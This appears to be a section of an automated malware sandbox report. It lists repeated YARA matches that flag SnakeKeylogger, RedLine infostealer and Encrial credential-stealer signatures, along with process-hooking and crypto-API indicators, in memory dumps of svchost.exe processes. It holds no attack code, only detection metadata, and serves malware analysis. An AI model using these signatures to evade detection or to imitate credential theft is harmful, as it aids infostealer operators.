              Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 5.2.chordates.exe.13e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000006.00000002.4470352706.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000002.00000002.2040744990.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000003.00000002.4470368288.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000005.00000002.2183245336.00000000013E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, -k.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, -cA-.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.7b00000.4.raw.unpack, -cA-.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, -k.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, -cA-.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.3174f2e.1.raw.unpack, -cA-.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, -k.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, -cA-.cs | Cryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.svchost.exe.7730f20.3.raw.unpack, -cA-.cs | Cryptographic APIs: 'TransformFinalBlock'
